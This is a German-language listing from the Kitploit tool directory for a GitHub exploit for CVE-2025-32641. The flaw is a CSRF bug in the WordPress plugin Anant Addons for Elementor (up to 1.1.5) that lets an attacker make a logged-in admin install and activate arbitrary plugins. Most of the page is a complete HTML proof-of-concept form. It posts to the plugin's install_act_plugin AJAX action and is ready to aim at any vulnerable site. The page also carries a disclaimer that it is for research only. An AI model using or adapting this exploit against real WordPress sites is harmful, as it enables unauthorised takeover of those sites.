Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/nxploited/cve-2025-32641
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPapers & ForschungLernen & Bildung
GitHubnxploited/cve-2025-32641

CVE-2025-32641

Anant Addons for Elementor <= 1.1.5 CSRF zu Schwachstelle für willkürliche Plugin-Installation

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🛡️ Anant Addons for Elementor <= 1.1.5 - CSRF zu beliebiger Plugin-Installation

🧨 CVE-2025-32641

Cross-Site Request Forgery (CSRF)-Schwachstelle in anantaddons' Anant Addons for Elementor
Dieses Problem betrifft Versionen: von unbekannt bis 1.1.5

  • Basis-Score: 9.6 (KRITISCH)
  • CVSS-Vektor: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

🔍 Beschreibung

Diese Schwachstelle ermöglicht es nicht authentifizierten Angreifern, eine beliebige Plugin-Installation im Namen eines eingeloggten Administrators ohne dessen Wissen durchzuführen.
Durch Erstellen einer bösartigen Seite oder eines Formulars kann der Angreifer den Admin stillschweigend zwingen, ein beliebiges Plugin aus dem WordPress-Repository zu installieren und zu aktivieren.


💥 Auswirkungen

  • ✅ Beliebige Plugin-Installation
  • ✅ Plugin-Aktivierung
  • ❌ Kein Nonce oder CSRF-Schutz
  • ✅ Ausnutzbar über eine einfache HTML-Seite
  • ⚠️ Erfordert, dass der Admin eingeloggt ist und die bösartige Seite öffnet

🧪 HTML Proof of Concept

root@kitploit:~
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Anant Addons for Elementor <= 1.1.5 CSRF Exploit</title>
  <style>
    body {
      background-color: #111;
      color: #0f0;
      font-family: monospace;
      padding: 40px;
    }
    h1 {
      color: #ff0055;
      font-size: 24px;
      border-bottom: 1px solid #555;
      padding-bottom: 10px;
    }
    .box {
      background-color: #222;
      border: 1px solid #444;
      padding: 20px;
      margin-top: 20px;
    }
    input[type="submit"] {
      background-color: #ff0055;
      color: #fff;
      border: none;
      padding: 10px 20px;
      font-weight: bold;
      cursor: pointer;
    }
    input[type="submit"]:hover {
      background-color: #cc0044;
    }
  </style>
</head>
<body>

  <h1>
    Anant Addons for Elementor <= 1.1.5<br>
    CSRF to Arbitrary Plugin Installation Vulnerability
  </h1>

  <div class="box">
    <p># By: <strong>Nxploited | Khaled Alenazi</strong></p>
    <p># Type: <strong>CSRF (No Nonce Validation)</strong></p>
    <p># Impact: <strong>Unauthenticated attacker can force admin to install and activate arbitrary WordPress plugins</strong></p>
  </div>

  <form action="http://192.168.100.74:888/wordpress/wp-admin/admin-ajax.php?action=install_act_plugin" method="POST" class="box">
    <input type="hidden" name="plugs" value="hello-dolly">
    <p>🎯 Click the button below to trigger plugin installation (admin session must be active):</p>
    <input type="submit" value="Exploit Now">
  </form>

</body>
</html>


🎯 Wenn ein eingeloggter Administrator auf dieses Formular klickt (oder es automatisch auf einer bösartigen Seite sendet), wird das Plugin stillschweigend installiert und aktiviert.


⚠️ Haftungsausschluss

Dieses Repository und die Inhalte sind nur für Bildungs- und Sicherheitsforschungszwecke bestimmt.
Der Autor ist nicht verantwortlich für Missbrauch oder Schäden, die durch unsachgemäße Verwendung dieser Informationen entstehen.
Führen Sie Tests immer nur an Systemen durch, die Ihnen gehören oder für die Sie die ausdrückliche Erlaubnis zum Testen haben.


von: Nxploited | Khaled ALenazi

Tool herunterladen